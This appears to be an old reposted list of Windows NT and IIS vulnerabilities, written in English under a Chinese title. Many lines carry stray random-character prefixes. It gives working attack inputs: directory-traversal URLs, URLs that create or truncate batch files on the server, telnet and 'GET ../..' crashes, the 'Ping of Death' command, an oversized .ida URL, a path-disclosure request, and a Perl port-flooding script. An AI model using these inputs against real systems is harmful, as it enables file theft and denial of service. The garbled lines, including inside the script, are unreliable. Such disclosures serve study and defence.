NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
! _1 G- c! O5 J
/ ^8 m9 M( h8 |( [  X# \, {" ^A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
; d! R& i$ n7 d6 `
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

; w8 [0 l- u: F, o--------------------------------------------------------------------
- R# z1 H& V* X6 h/ g" j  T) [* q
受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
( T2 C% d0 e( V: j" J/ [! f
; f+ D5 v* M3 NIf the file 'target.bat' exists, the file will be truncated.

1 z8 u; U3 G" q
7 \1 H. ~4 n1 o$ j. SA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

: K# q# A) c  X6 X: \* D----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
5 U( z" d9 v  h+ q% Q5 J0 y9 Y5 K  nMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
0 I& @2 x* e+ r, V
The following steps;
- c+ t- f- F- ~8 L+ l& u
) i5 B# O8 a8 T: g5 `( ~Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
3 l3 N2 s9 |4 @: G0 a! T- _4 @results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
' i- K0 V" M2 C9 P- }, z7 n
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
- E; l/ h5 a# O. t' `& `7 ^
# k  P7 {' Y4 @The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
! ~* y$ ~6 t0 b: K# ~
6 |8 y; y0 R& w, {# aIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
' x# w2 M: w$ h) ^) o& f; ^. A
1 N1 N3 t! D9 z. R. SThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

- M/ d, S" G' h, m( j  M7 `use Socket;
use FileHandle;
1 `6 K  Q5 F* rrequire "chat2.pl";

: O+ S% N5 ?# P$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
; t3 g" h& k6 n* ^$ P1 Bfor ($port = $0; $port<65535; $port++)
{
; u. v4 Z4 ~; A: x+ v, R' J( g, a

if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
4 p6 J  a) t; h6 \  Y# G}
$fh = chat::open_port($systemname, $port);
- J2 A* p5 F' z% i, Qchat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
9 V( W# z; N( _& [) Y2 C" q}
chat::close($fh);
, N$ R  i  o- Q$ `/ B# s2 _) g$ i
}
, O% V4 H0 E% m9 P2 r) p( S

9 w! ]$ u  P% X2 s4 f/*end poke code*/
! }2 \2 J& |* G0 l0 x5 ?' ~& u
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

' @; P2 [( _+ B--------------------------------------------------------------------------------
0 B) w/ Z4 _* \3 M
受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

8 `" i7 R# A+ DThis attack causes Dr. Watson to display an alert window and to log an error:

$ E9 F5 {- [, H& v  l"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

- ]' z! H! m4 f4 j: }9 v--------------------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
# W6 J& z: v5 T3 N5 L8 D' \Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

- K/ C, d+ [5 T' @( j" X-OR-
4 q+ p( l" }$ @
5 P5 z: B( s  M. _STOP: 0x0000000A
! e! j5 D: R: DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
. A8 q4 H0 O1 X, A* b3 E+ ~/ u; f
- k% ]8 W& M4 X+ U7 lNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
3 B! [% `) o" r# C6 ~" ~
--------------------------------------------------------------------------------
5 D: M' J- y, E" {) a6 V
3 s9 H1 o2 D$ H, z: J0 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
; i8 F! p2 @+ p% D7 l) E
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server